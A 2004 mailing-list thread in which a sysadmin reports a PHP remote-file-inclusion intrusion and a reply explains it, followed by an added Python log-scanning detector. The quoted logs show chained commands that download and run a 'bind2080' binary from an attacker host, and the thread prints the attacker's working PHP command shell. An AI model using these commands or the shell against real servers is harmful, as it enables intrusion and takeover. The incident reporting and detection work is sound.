Re: Hack attempt
Hi-
It appears that the file <some script>.php is vulnerable to a file
injection. Basically what that means is that it accepts whatever value
someone puts into the bodyfile variable and inserts its code before
parsing the script. This allows the attacker to run whatever code as
the user that your web server runs as. You will need to fix the code to
not allow inserting remote files.
If you need any more information, feel free to reply and I will try to
help.
Kevin Johnson
On Wed, 2004-07-21 at 11:02, Norbert Crettol wrote:
> Hi all.
>
> This is my first post here. I'm Norbert Crettol, one of the sysadmins
> of Idiap, a research center in Switzerland (www.idiap.ch).
>
> We've had an undesired visitor last night, which I discovered in the
> reports of tripwire.
>
> Here are the logs we got (we get a remote copy of the web server logs
> on another host). As of the second line, I've stripped the head and
> the tail of the line, which is always the same.
> --- begin ---
> "GET /<some script>.php?bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=id HTTP/1.0" 200 6625 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
> bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=uname%20-a
> bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=wget
> bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=/sbin/ifconfig%20-a
> bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/;ls%20-la
> bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/lock/;ls%20-la
> bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/lock/;wget%20bosscalvin.com/bind2080
> bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/lock/;chmod%20755%20bind2080
> bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/lock/;./bind2080
> --- end ---
> I've seen no other
>
> It looks like bind8080 has created a directory /var/lock/.tmp
> and expanded an (owned by the web server owner) archive there. Here
> is the list of the files :
> 3225 jui 20 03:53 c-leet
> 15 jui 20 03:47 c-leet.dir
> 51 jui 20 03:47 cron.d
> 512 mai 12 2002 doc/
> 14 jui 21 16:27 eggdrop -> eggdrop-1.6.10*
> 2523568 mai 12 2002 eggdrop-1.6.10*
> 512 mai 12 2002 filesys/
> 343 fév 11 03:55 fuck*
> 512 mai 12 2002 help/
> 21149 nov 4 2003 kik*
> 1024 jui 21 11:00 language/
> 512 mai 12 2002 logs/
> 6 jui 20 03:48 pid.CaEm-
> 23065 jan 29 15:00 proc*
> 6 jui 20 03:48 psybnc.pid
> 28591 mai 12 2002 README
> 89 jui 20 03:53 run*
> 588 avr 1 10:00 run-*
> 708 avr 1 10:00 run--*
> 512 mar 31 08:12 scripts/
> 512 mai 12 2002 text/
> 2523568 mar 28 01:41 vi*
> 30293 nov 17 2002 xhide*
> 182 jui 20 03:47 y2kupdate*
>
> Here is the content of http://www.bosscalvin.com/inject.txt :
> --- begin ---
> <font color="red">
> <br><font face="Comic Sans MS" size="2"><center>
> <b>CMD</b> - System Command<br><br></center></font><font face="Verdana" size="1"></center><br>
> <b>#</b> CMD PHP : <br>
> <b>#</b> Released by : <b>SecurityCorp</b><br>
> <b>#</b> Edited by CaEm
> <br>
> <br>
> <hr color="red" width=751px height=115px>
> <br>
> <pre><font face="Verdana" size="1">
> <?
> // CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
> if (isset($chdir)) @chdir($chdir);
> ob_start();
> system("$cmd 1> /tmp/nobody 2>&1; cat /tmp/nobody; rm -rf /tmp/nobody");
> $output = ob_get_contents();
> ob_end_clean();
> if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
> ?>
> </font></pre>
> <br>
> <hr color="red" width=751px height=115px>
> <br>
> <font face="Comic Sans MS" size="1"><b> CaEm  </b><br><b>@ </b><b> ÃrÃ.ÃÃÂ.ÃÃt <i>#Renjana</i></b><br>
> --- end ---
>
> Has someone seen this kind of attack? (chkrootkit doesn't detect it.)
> Has someone heard of this www.bosscalvin.com (or www.calvinmumu.org)?
> Is there a way to stop this guy? His nickname (CaEm) appears in the
> uploaded scripts.
>
> Norbert
>
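Kevin's description (the script fetches whatever URL is passed in bodyfile and executes it) and Norbert's log excerpts together suggest a simple check to run over the web server's access log, which is what the following added example does; it is not code from either poster. It scans Apache combined-format lines for any query parameter carrying a remote URL and pulls out the accompanying cmd value, so each injected command is listed with its source address and time. The log lines, hostname, script name, client addresses and timestamps are constructed placeholders modelled on the request shape quoted in the thread.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample lines in Apache combined log format, modelled on the request
# shape quoted in the thread; host, script name, addresses and times are placeholders.
SAMPLE_LOG = """\
10.0.0.5 - - [21/Jul/2004:03:47:01 +0200] "GET /page.php?bodyfile=http://evil.example/inject.txt?&cmd=id HTTP/1.0" 200 6625 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
10.0.0.5 - - [21/Jul/2004:03:47:09 +0200] "GET /page.php?bodyfile=http://evil.example/inject.txt?&cmd=cd%20/var/lock/;wget%20evil.example/bind2080 HTTP/1.0" 200 512 "-" "Mozilla/4.0"
10.0.0.7 - - [21/Jul/2004:03:50:00 +0200] "GET /page.php?bodyfile=home HTTP/1.1" 200 4000 "-" "Mozilla/5.0"
10.0.0.8 - - [21/Jul/2004:03:51:00 +0200] "GET /page.php?bodyfile=FTP://evil.example/x.txt HTTP/1.1" 200 4000 "-" "curl/7.10"
"""

# Client, timestamp, request target and status of a combined-format line.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
REMOTE_SCHEMES = ("http://", "https://", "ftp://")


def parse_query(query):
    """Split a query string on '&' only and percent-decode both sides.

    Done by hand instead of parse_qsl so that ';' inside a value (the chained
    shell commands above) stays part of the value rather than acting as a separator.
    """
    params = []
    for part in query.split("&"):
        if part:
            key, _, value = part.partition("=")
            params.append((unquote(key), unquote(value)))
    return params


def find_rfi_attempts(log_text):
    """Return one record per request that passes a remote URL in a query parameter."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        params = parse_query(parts.query)
        cmd = next((v for k, v in params if k == "cmd"), None)
        for key, value in params:
            # Scheme check is case-insensitive; the trailing '?' on the remote URL
            # makes anything the script appends to it part of the query string.
            if value.lower().startswith(REMOTE_SCHEMES):
                hits.append({"ip": m.group("ip"), "ts": m.group("ts"), "script": parts.path,
                             "param": key, "remote": value, "cmd": cmd, "status": m.group("status")})
    return hits
```

Run it over a real access log by passing the file contents to find_rfi_attempts; a 200 status on a flagged request is the case to treat as a probable compromise rather than a mere probe.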
- References:
- Hack attempt
- From: Norbert Crettol <norbert.crettol@idiap.ch>